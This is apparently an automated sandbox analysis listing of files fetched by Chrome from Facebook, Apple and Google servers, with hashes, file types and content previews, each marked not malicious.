                                                                                                                                                                                                                                SHA-512:84753A2C2F0C25EF4A410F9B961C7AA2C5AB93B5E809FD333EE5F7A76BB9CDE6B49ECE11C4FF0F0282673199B15B1C667431DE8FA94B19728945106481F448A9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/84/16/80/841680b1-3872-7fa5-37c4-35741395390c/AppIcon-0-1x_U007emarketing-0-6-0-85-220-0.png/146x0w.webp
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............VP8 4....+...*....>.N.I."!...D....f+.........w.....!.&~;F.._0..~.^c.k.]=..{.............M.O.6...e..^.V..p.|..ompNg.<z...hv.)..Q...S....O.n.O..,T..|U..?.x.....`:.9./.......7....'T.W......#..F\E5M....w...r....i...hL.9.IWK.jD.-K..{...j}n.nP.1kU.P...K.R.^.epJ.ND......x.`....G.}_^...Z.\Z.r....<.z.2.3\.9....G.GY.C6Z..~.w.......1fwaU.<.yW.+.X_.c.nC4.^.z..............)......R.2....h..(d8..1.(,W.......m..Hq.`aS.-|S87..<yZ...5=.yYp6...r...1.o.q.....|?].....w....C...;.._.N...]w.....M...2.X=..*..'y.V._.."5..8y..=.J.o........?'8.;Q?'+!....=..7......a.Rl..7...6|..=......Qh.... P......"{..>cR.......~..d..'[Z....V.nZ-h..}J.pxP..`..R.Rd......q.|..Q.W.(.c........_.....w..f..w..<..2.B6>P......6..5.._w.c..X...P..O0.r......(,..w..N....1Rx3a$..55......A..X.....$W..'.|.}.\..M..S....z..$V...?.....k....]3....P.}_...vG......_LYH...Xt....o.zY.....L8..'p.....J....o.........?..!.E.V"}.< R.."i.!...n...3../'6.....[......d.*.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (563)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):582
                                                                                                                                                                                                                                Entropy (8bit):5.204232886763647
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:zXJnCMA7Qx+6oFACVQPI4RoJLQPIYKcAaZq9VsxI0LWYcNq50SfnUwLQg5jQW:LRCMxVqF6PIHkPIY2eq9VsCyWROUwLQe
                                                                                                                                                                                                                                MD5:A57F69DD143794030B4FAB18E1F76810
                                                                                                                                                                                                                                SHA1:851B709612FC28473A8F3A85EB769207D01C025B
                                                                                                                                                                                                                                SHA-256:4F591A9B5C7C1C49F52DBF405E39B5305C28DA1D4E607B50DD118FEE3635A599
                                                                                                                                                                                                                                SHA-512:FF46BD59AE8511E93855E656EF7D6B74DDD8F83EA2A0B72381B9962ED9835624F1AEF111A0A898BFDA3D85CF41A6BD74F095D13C1DE98E1E6A2E3341B50AD857
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/GcgopRl4mBW.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsDataAtomDebugger",["URI"],(function(a,b,c,d,e,f){"use strict";var g,h={shouldLog:!!new(g||b("URI"))(window.location.href).getQueryData().dispatcherevents,toggleLogging:function(){h.shouldLog=!h.shouldLog},isLogging:function(){return h.shouldLog},attach:function(a){a.register(function(a){a=a.action;if(a){console.timeStamp&&console.timeStamp(a.type);if(h.shouldLog){var b=a.type,c=a.actionType;a=babelHelpers.objectWithoutPropertiesLoose(a,["type","actionType"]);console.groupCollapsed(b||c,a);console.trace();console.groupEnd()}}})}};e.exports=h}),null);
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:C source, ASCII text, with very long lines (4739)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6156
                                                                                                                                                                                                                                Entropy (8bit):5.35625511599146
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:XmZ9kbptGzE4rTGqlBV5l5/IiNSZ1HPyy0KjEL2VcI:XmZ9kbGzEG5lBVL+iI2yljg6cI
                                                                                                                                                                                                                                MD5:C4CD29E090B8BB37F44EAE73DCFB0ABC
                                                                                                                                                                                                                                SHA1:6440CEF9A4CCD7198FCD669F775FAE65B52E63CD
                                                                                                                                                                                                                                SHA-256:1AF4A64548B3003042221EE0B21D889FD6420CCF1A981A1122DEE5FACE97E4B3
                                                                                                                                                                                                                                SHA-512:0363DAA966E9D41C9235C67C13C261BE41C3C5D513838CF328824F84385C1B5D3FEFCF54EA8E3FD9BAF9E1A48B671F15090D51089F6561E471B85549724ED446
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("DOMControl",["$","DataStore"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this.root=b("$").fromIDOrElement(a),this.updating=!1,b("DataStore").set(a,"DOMControl",this)}var c=a.prototype;c.getRoot=function(){return this.root};c.beginUpdate=function(){if(this.updating)return!1;this.updating=!0;return!0};c.endUpdate=function(){this.updating=!1};c.update=function(a){if(!this.beginUpdate())return this;this.onupdate(a);this.endUpdate()};c.onupdate=function(a){};a.getInstance=function(a){return b("DataStore").get(a,"DOMControl")};return a}();e.exports=a}),null);.__d("Input",["CSS","DOMControl","DOMQuery"],(function(a,b,c,d,e,f,g){function h(a){return!/\S/.test(a||"")}function i(a){return h(a.value)}function a(a){return i(a)?"":a.value}function b(a){return a.value}function e(a,b){a.value=b||"";b=c("DOMControl").getInstance(a);b&&b.resetHeight&&b.resetHeight()}function f(a,b){b||(b=""),a.setAttribute("aria-label",b),a.setAttribute("placeholder",b)}funct
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):231862
                                                                                                                                                                                                                                Entropy (8bit):5.4580370109650715
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:5fLeYH8At6JK37OeR8NteGvQ+AMPpgArl0xYu5s713hW:5fLeYc+6JaH8N7QQGArHu5s713A
                                                                                                                                                                                                                                MD5:3E34065323CCD70417621B0687E56775
                                                                                                                                                                                                                                SHA1:F63D803164D63317D51A708C942FF511725A9E16
                                                                                                                                                                                                                                SHA-256:5EBCE957851EB83517851E8613F012EB45AA4EBB6142B92C30B7D9492C874E22
                                                                                                                                                                                                                                SHA-512:EDB02D4A93A15771FB0768C8A45F3DBAF0908E5C450737D59AF5804840B10E33C0955831B4B6B3F3362A839CC8DBEF2169667F4FDFB40299FDCB80E8A16051EA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                                                                Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6544)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13393
                                                                                                                                                                                                                                Entropy (8bit):5.410452822445596
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:6cJVUw5yrnVinZnt250Jrxr0UYrAmKRdeiTzVl7v2Vpfd2A2Ks6DBPjbTUDwCFVW:6SnWVinZnSO355zXv2Vpfd2A2Yjn
                                                                                                                                                                                                                                MD5:9512B522526C50D8D6A8BDFE73A720A0
                                                                                                                                                                                                                                SHA1:0233D6921F5694C7599DAADDBFADBD65C9248068
                                                                                                                                                                                                                                SHA-256:42264DFE70407A2AEFA31B4286D407B44DC9CAA4D61F59637908D1ECED68F595
                                                                                                                                                                                                                                SHA-512:F3A2EEA8EA2A762106B3FCBF1562ADB93D3E68BC573EEE7BA6B6D2581B8E7C604CCF0ADBB65A7E5028BB59EB9130E07C8B11A9937A2CC968D85213229A383968
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractSearchSource",["Promise"],(function(a,b,c,d,e,f){var g;a=function(){function a(){}var c=a.prototype;c.bootstrap=function(a){var c=this;this.$1||(this.$1=new(g||(g=b("Promise")))(function(a){c.bootstrapImpl(a)}));return this.$1.then(a)};c.search=function(a,b,c){this.searchImpl(a,b,c)};c.bootstrapImpl=function(a){a()};c.searchImpl=function(a,b,c){throw new Error("Abstract method #searchImpl is not implemented.")};c.clearBootstrappedData=function(){this.$1=null};return a}();f["default"]=a}),66);.__d("ExplicitRegistrationReactDispatcher",["ExplicitRegistrationDispatcher"],(function(a,b,c,d,e,f,g){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(){return a.apply(this,arguments)||this}var c=b.prototype;c.dispatch=function(b){a.prototype.dispatch.call(this,b)};return b}(c("ExplicitRegistrationDispatcher"));g["default"]=a}),98);.__d("LayoutColumn.react",["cx","joinClasses","react"],(function(a,b,c,d,e,f,g,h){var i,j=i||d("react");b=j.forward
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ISO Media, MP4 Base Media v5
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):897
                                                                                                                                                                                                                                Entropy (8bit):3.286994568481275
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:jOj47S4xXSk7t+XckcEtlwhScxGg+ROteYyjilfI10I+QBld3:jOk7S4gkEtlwhSc/+RYfI1JdBl
                                                                                                                                                                                                                                MD5:5B537BF841688CC3C1F309ADB669D108
                                                                                                                                                                                                                                SHA1:602224ADCCD5E89A063CC61C8A4953097B97B684
                                                                                                                                                                                                                                SHA-256:1FFFB1845A2464971676D04B637F2415AECF69605D21FB4C4B0F1E89CAB7F07A
                                                                                                                                                                                                                                SHA-512:73139E563AA9908FAE82870D610C5DA8C117BFFAEBED9847C463B0D86FC39DBC867FB3E9A87D72F0FA15E84ECB8DD3CF6DE75DED32F7953838E5F171D66924AE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/a0/6f/ba/a06fba65-f57a-cf31-312d-b06e3b087612/P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4:2f81d12bbaaff0:0
                                                                                                                                                                                                                                Preview:....ftypiso5....isomiso5hlsf...emoov...lmvhd......J..J..u0....................................................@..................................xtrak...\tkhd......J..J............................................................@....V..........mdia... mdhd......J..J..u0....U......1hdlr........vide............Core Media Video.....minf....vmhd...............$dinf....dref............url .......{stbl.../stsd............avc1.........................V...H...H...............................................1avcC.d......'d...R0X......@.Z....oZ......(......a4snf.............................................................................................colrnclx...........fiel......chrm......pasp............stts............stsc............stsz................stco...........Qudta...Iswre....U.mediafilesegmenter: Version 1.20.4 (618.16ib-230418) Linux....(mvex... trex........................
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):140
                                                                                                                                                                                                                                Entropy (8bit):5.195274886068422
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:+u0T3+Dr7ScTQPvmV1K8RAsvWzlInKadeNK52b:RMe/bakKAAsuUKadeY52b
                                                                                                                                                                                                                                MD5:23F88E284442DA3273D32F8EF43E1C04
                                                                                                                                                                                                                                SHA1:7616F3C3D7CEA42AE9FDE2A9D9D292F6F98B413C
                                                                                                                                                                                                                                SHA-256:4EC6B501CBA0B20C832399BF60EF95C8BE1A383167F8CF99D837D7DE61E5B724
                                                                                                                                                                                                                                SHA-512:03A51FC8D36C051575295876086751789F39DB321651F1559F4D0668069FED25D50F8E812F758B382B254D58BF9CD186FFE9386A3A290B0284CB1A2942EC4F47
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkbMnFS9SzlUhIFDYOoWz0SBQ3Fk8QkEiUJ_BMmCEAc3rsSBQ3VLTVEEgUNkWGVThIFDTwvUGESBQ2RYZVO?alt=proto
                                                                                                                                                                                                                                Preview:CkEKDQ2DqFs9GgQIVhgCIAEKMA3Fk8QkGgQISxgCKiMIClIfChVAIS4jJCpfLSY/KyUvLF4pOj18figQARj/////DwokCgcN1S01RBoACgcNkWGVThoACgcNPC9QYRoACgcNkWGVThoA
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10204), with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10204
                                                                                                                                                                                                                                Entropy (8bit):5.282533445396263
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:U38kcmi3U2hQctc1cJcpcZrEccxNsMlcTctcIceCgycLcvXRkEsYNtGr:U38ZZU2hxtc1cJcpclEHllcTctcIc3gP
                                                                                                                                                                                                                                MD5:97E3F38781BA136C719D08CA0EC5162F
                                                                                                                                                                                                                                SHA1:5604E5C9095068500FD764E4E7608CD489D272CC
                                                                                                                                                                                                                                SHA-256:9DC2DC3E987AC76A2AE4DCC3A4DE7BF5D09DEACD4780C9F8BA7EC263380809CF
                                                                                                                                                                                                                                SHA-512:0716DD98795D9184A7A1508B87F9D17FAE217CC0364D42D075AF5D4C6BC1FD37E6FC07C4F6798D96AF028608075666D133C15977F38F8748421586BB9833E507
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:!function t(e,i,n){function s(o,r){if(!i[o]){if(!e[o]){var l="function"==typeof require&&require;if(!r&&l)return l(o,!0);if(a)return a(o,!0);var c=new Error("Cannot find module '"+o+"'");throw c.code="MODULE_NOT_FOUND",c}var h=i[o]={exports:{}};e[o][0].call(h.exports,(function(t){return s(e[o][1][t]||t)}),h,h.exports,t,e,i,n)}return i[o].exports}for(var a="function"==typeof require&&require,o=0;o<n.length;o++)s(n[o]);return s}({1:[function(t,e,i){"use strict";e.exports={EventEmitterMicro:t(2)}},{2:2}],2:[function(t,e,i){"use strict";function n(){this._events={}}let s=n.prototype;s.on=function(t,e){return this._events[t]=this._events[t]||[],this._events[t].unshift(e),e},s.once=function(t,e){let i=this;return this.on(t,(function n(s){i.off(t,n),void 0!==s?e(s):e()}))},s.off=function(t,e){if(!this.has(t))return;if(1===arguments.length)return this._events[t]=null,void delete this._events[t];let i=this._events[t].indexOf(e);-1!==i&&this._events[t].splice(i,1)},s.trigger=function(t,e){if(thi
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3866)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):33229
                                                                                                                                                                                                                                Entropy (8bit):5.52332107809849
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:qj0AsLWsZmQpp8SCZd+jZ4U/ZAzwznMp058TCUb/3Moq9zbjBRq6LX:Qcm6pvvnBRD
                                                                                                                                                                                                                                MD5:C902F6616E13701E299223748DE72D44
                                                                                                                                                                                                                                SHA1:6558DA57C9F74BB1D03DB994D1F92B96AD8587C5
                                                                                                                                                                                                                                SHA-256:141B75CC8F99E2D499DFBAD14B3B82BCA3BC25AB4E4F27355D418F645403514A
                                                                                                                                                                                                                                SHA-512:42BF103EEC7EE60064BBF677C8E0877B89630B65E71BD62ACF5522358C92DBBB796B970EE7D101E46D967A1D444533A20BCB22BD7F7F71E4B7626F1718790066
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.Nq=function(a){var b=_.td("nQyAE",window);var c=_.td("TSDtV",window);if(c&&typeof c==="string"){var d=_.Wg(_.Mh(c,_.dwa),_.Lq,1,_.Sg())[0];if(d){c={};for(e of _.Wg(d,_.ewa,2,_.Sg()))switch(d=_.I(e,7),_.Vg(e,_.Mq)){case 3:c[d]=_.hh(e,_.Ng(e,_.Mq,3));break;case 2:c[d]=_.jh(e,_.Ng(e,_.Mq,2));break;case 4:c[d]=_.aia(e,_.Ng(e,_.Mq,4));break;case 5:c[d]=_.th(e,5,_.Mq)}var e=c}else e={}}else e={};if(e&&Object.keys(e).length>0)for(let f of Object.keys(e))f in b||(b[f]=e[f]);b=b[a];return b!==void 0?new _.vd("nQyAE."+.a,b):null};_.fwa=function(a){return new Uint8Array(_.vc(a)||0)};_.Oq=function(a){var b=[];const c=a.Rb==null?null:_.zia(a,_.Bia(a));return c===null?_.zia(a,b):c};_.ewa=class extends _.z{constructor(a){super(a)}};_.Mq=[2,3,4,5,6];_.Lq=class extends _.z{constructor(a){super(a)}};_.Lq.prototype.N=_.p(36);_.dwa=_.od(class extends _.z{constructor(a){super(a)}});._.INa=new Set([1]);_.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2256)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):2800
                                                                                                                                                                                                                                Entropy (8bit):5.166987020827454
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:upnlrpevhTuAG9tXDMTEkxseaD2ND+gJ7T7+J3SWDWCSSAUNZIoz6hpysy7K4Cf:upnlruLetzMoys/Dg63SF8vOhpysy7K9
                                                                                                                                                                                                                                MD5:2B00E754EC8A552398780F9E970D000C
                                                                                                                                                                                                                                SHA1:D6334FD54EF4F18B69806AAAC7A59A40D61D4565
                                                                                                                                                                                                                                SHA-256:21D51189776F6200F998912EB4FEA70F9B8A48EF2DC37FDFDFAD6E1511E7F463
                                                                                                                                                                                                                                SHA-512:77E6D0C809DBDCA3E23736E3F6B26E64C8EDE4F9426C36EFA3C06F96C47DB2C5E30EDA52B02714791EF2937CB5092949750916D07563428C92DD11D22101F10A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-bb5da73d.js
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as t}from"./p-2649b6ee.js";var n=t((function(t,n){function e(t,n,e="",r=14,o,i){const s=new Date;o=null!=o?o:window;const u=(i=null!=i?i:/\./.test(o.location.hostname)?o.location.hostname:"").length>0?`domain=${i}; `:"";s.setTime(s.getTime()+24*r*60*60*1e3);let c="";"https:"===o.location.protocol&&(c="; secure"),o.document.cookie=`${t}=${n}; expires=${s.toUTCString()}; ${u}path=${e}${c}`}function r(){let t=!1;try{t="undefined"!=typeof sessionS
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):12738
                                                                                                                                                                                                                                Entropy (8bit):7.981822110186911
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:4De57jXcA/LSZgXihPzkr5SiDDfjbenDvtOINRmt/xwThdzK4ra0X:4i7rLSyitzt+/87tngDK24rh
                                                                                                                                                                                                                                MD5:CBA5B2EF30FCCD76A63324BE2FE89772
                                                                                                                                                                                                                                SHA1:D45610999887710ECF0C12841BAAC840CAEF3EF2
                                                                                                                                                                                                                                SHA-256:B5C774F4EED59D9F6E4A4F6B783F1500EC35CDC10ECE19B962B65F4CD34D1CD8
                                                                                                                                                                                                                                SHA-512:64F35CB24D8CF25437910C8D37E4164158B5FB7B3490714D227989A3C3FE8D26F14AC428063CD6807629B33C6C1BC22FB02A45F74B28EF42F2684127D975BFBD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/xNx9CfCzg_VugRMv3rIxVd-GjLRx6_dIXGfTlrKqJwkZCPg_w-ZZNosQT46MYIoo_Q=w526-h296-rw
                                                                                                                                                                                                                                Preview:RIFF.1..WEBPVP8 .1.......*..(.>e(.E$"..[.@.D..he..s........o...w........UW..:.......+.'......A.....J......d?..P....~.................[................W..........o...^....@?.q@.e.]...+...m..p}.rO.G.^..3....._......s.....B?".{.[.?....z..1.?....w..|.}?..E>......w.c......?.........._._.......o.C.#..._.?m=.}W.....7..._............/...n..{.......U.#}.F.@.I4x.D#].....l..b.5.$._...1..3.....~.0D..."T....WV....R+|(....\b.....S...."_3.w........W.#.&...9......A.Zk......o.Zt*.X.qCr.....(..U.j..Y.B..6o...Mu.gA..D..qd2.8...~..}.|f.Z.<....sp.Z.sQ.....X..M.fU....)o.5.I.Y....R.=...H.d...%.O6.D...*F..zb.?..n.....x..C$\.E...(D..$.,j.&......#...m..O..Z$..h....sxq.nO..L.e.!......56..O..m..h.y..Z.\s...f..o...-k.HU.LTl..eH..'..5...@..<?$f.L;...iwG....,.++~.<..4.....d..G..q[.1.Qxy$..9..q......I.9*...u;.p.....lk.>....\..V.8n...#`;.@...A.C;..".cI."..~........tl]..r<^....NO3.-...^y..o!...Q....t.,.E.....~TV......y.:.7U...i.k:..q..A}....;......\.a@ei..I..<G_@.l.V.if...+.k.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):2549
                                                                                                                                                                                                                                Entropy (8bit):4.065824216102575
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:t4tQ6dEHu+4CE/EiFyCmxOJLGe1sxmJLOTyX3WCQ9yCmxOJLA5J2z5D6M9JMPxg0:WiE/yCmr9hj9mP0kOpFnqo7gX
                                                                                                                                                                                                                                MD5:ECD94021D2C853C3B8DEB8203BA17300
                                                                                                                                                                                                                                SHA1:6F0E24BAF66AE386041E8FAF42363418A4C96144
                                                                                                                                                                                                                                SHA-256:0D6F8D206A6BD8B60A2048A3DF206AC956A2F633786E4AF1C02057F81758AD7A
                                                                                                                                                                                                                                SHA-512:1967613484EB4FB2A50628CCED684C3E1022D1DF51D5AA86ADE53828DBDF0A748A8E99669C08EC5A9AA4BA97DC74F709AD4798BF486C1BAEEC60D24B223E5D50
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg
                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1090" height="360" fill="none" viewBox="0 0 1090 360">. <path fill="#0866FF" d="M881.583 257.897h29.48v-47.696l41.137 47.696h36.072l-47.89-54.969 40.909-47.663h-32.825l-37.403 43.93v-96.982l-29.48 3.864v151.82Zm-67.988-105.261c-32.728 0-55.455 22.013-55.455 53.929s22.727 53.929 55.455 53.929c32.727 0 55.455-22.013 55.455-53.929s-22.728-53.929-55.455-53.929Zm0 82.728c-15.163 0-25.552-11.721-25.552-28.799s10.389-28.799 25.552-28.799c15.162 0 25.552 11.721 25.552 28.799s-10.39 28.799-25.552 28.799Zm-119.807-82.728c-32.727 0-55.455 22.013-55.455 53.929s22.728 53.929 55.455 53.929c32.728 0 55.455-22.013 55.455-53.929s-22.727-53.929-55.455-53.929Zm0 82.728c-15.162 0-25.552-11.721-25.552-28.799s10.39-28.799 25.552-28.799c15.163 0 25.552 11.721 25.552 28.799s-10.389 28.799-25.552 28.799Zm-112.826-82.728c-13.636 0-24.935 5.357-32.013 15.162v-65.585l-29.513 3.831v151.82h26.169l.519-15.844c6.981 11.818 19.481 18.474 34.838 18.474 27.988 0 48.475-22.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2974)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):5493
                                                                                                                                                                                                                                Entropy (8bit):5.3972003055891165
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:98H8NJ808l8ch5h5Nlz/G0VsbQ6KTGgG2RlhUDxh66aTEoKTt:98H8D808l8i5h5NlzeIs5723hUjaAh
                                                                                                                                                                                                                                MD5:AC310E9AA6803396643CC705D292081F
                                                                                                                                                                                                                                SHA1:CA02EE3EFF60651EC231113F57924EFBD8600CBA
                                                                                                                                                                                                                                SHA-256:2E008E8F51E7714B45C90B3F1EB9DC53ECE6D04CD36F230D94DC57CECC64E36E
                                                                                                                                                                                                                                SHA-512:BE808436D234B818CD5B95EC40C74C61788C4F42411533A99ECE8C5E178D8EC91FEDA1A0A87D42894141EE085621A26BBD2156124DA9D1C1F989A0B38B415750
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/v87V0xuYr4I.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("IntlCLDRNumberType03",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a===0||a===1)return c("IntlVariations").NUMBER_ONE;else return c("IntlVariations").NUMBER_OTHER}};b=a;g["default"]=b}),98);.__d("IntlCLDRNumberType30",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a%10===1&&a%100!==11)return c("IntlVariations").NUMBER_ONE;else if(a%10>=2&&a%10<=4&&(a%100<12||a%100>14))return c("IntlVariations").NUMBER_FEW;else return c("IntlVariations").NUMBER_MANY}};b=a;g["default"]=b}),98);.__d("JSResource",["JSResourceReferenceImpl"],(function(a,b,c,d,e,f,g){var h={};function i(a,b){h[a]=b}function j(a){return h[a]}function a(a){a=a;var b=j(a);if(b)return b;b=new(c("JSResourceReferenceImpl"))(a);i(a,b);return b}a.loadAll=c("JSResourceReferenceImpl").loadAll;g["default"]=a}),98);.__d("QpActionFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3933)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):15391
                                                                                                                                                                                                                                Entropy (8bit):5.268517708621699
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:Pw21wClfXpg0JNGPq/MtLsXDqFlhaLjv3h:Po2fBJfEtsziXaLjvx
                                                                                                                                                                                                                                MD5:CE60742BF1533AE782AE943CA2E46D3D
                                                                                                                                                                                                                                SHA1:49EA2568DDE3A2368F96D293F3824E1633853F41
                                                                                                                                                                                                                                SHA-256:F4DFA8F5F61F1239882A3C4AE0981971DADCA7C66FB64F01C8F299CE5157A215
                                                                                                                                                                                                                                SHA-512:8F881198759785C7ADE63FA0D757AFED5D6D3036C3DAB02CA84BF0C9B4F5B51360F0ACEC3F7A7990644C39A87CBDCD9392665725A3FB986ADB0768D68AF77ABC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3imlR4/y0/l/en_GB/JAH0JDr9qF3.js
